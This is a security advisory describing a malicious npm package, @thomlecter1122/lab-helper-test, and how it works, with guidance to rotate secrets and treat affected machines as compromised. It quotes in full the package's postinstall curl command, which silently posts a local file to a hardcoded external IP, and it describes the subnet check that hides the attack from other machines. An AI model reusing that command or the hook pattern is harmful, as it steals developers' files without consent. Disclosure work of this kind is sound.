MAL-2026-5534
Dashboard / Malicious Package / MAL-2026-5534
MAL-2026-5534
Summary: Malicious code in @thomlecter1122/lab-helper-test (npm)
Details: Source: amazon-inspector (75adb75a0025882efbcde3ddd88882aaaedfd692425222eda99c148096f1f58a) The package ships a `postinstall` lifecycle script (`sec_check.js`) that fires automatically on `npm install`. The script first checks whether the host has a non-internal IPv4 address beginning with `192.` (a network-environment gate that hides the behavior from developer laptops and CI on other subnets), and if so executes `curl -X POST http://18.175.63.47:8080/collect --data-binary "@${INIT_CWD}/myfile.txt"` via `child_process.execSync` with stdio suppressed. This reads a file from the installer's working directory and ships it over plain HTTP to a hardcoded bare-IP attacker host with no consent and no error surfacing. The combination of automatic lifecycle execution, environment-gated activation, hardcoded bare-IP C2, and silent error handling is a textbook exfiltration dropper. Source: ghsa-malware (7d5621f003d1b1fcc0396da2f1f8bcc78608ffd1591818743c2234913e57f236) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
References: https://www.npmjs.com/package/@thomlecter1122/lab-helper-test/v/0.0.16, https://www.npmjs.com/package/@thomlecter1122/lab-helper-test/v/0.0.11, https://www.npmjs.com/package/@thomlecter1122/lab-helper-test/v/0.0.15, https://www.npmjs.com/package/@thomlecter1122/lab-helper-test/v/0.0.2, https://www.npmjs.com/package/@thomlecter1122/lab-helper-test/v/0.0.5, https://www.npmjs.com/package/@thomlecter1122/lab-helper-test/v/0.0.3, https://github.com/advisories/GHSA-223m-fcr3-c5gg
Affected packages
Package
Name: @thomlecter1122/lab-helper-test
Purl: pkg:npm/%40thomlecter1122/lab-helper-test
Affected ranges
Type: SEMVER
Events:
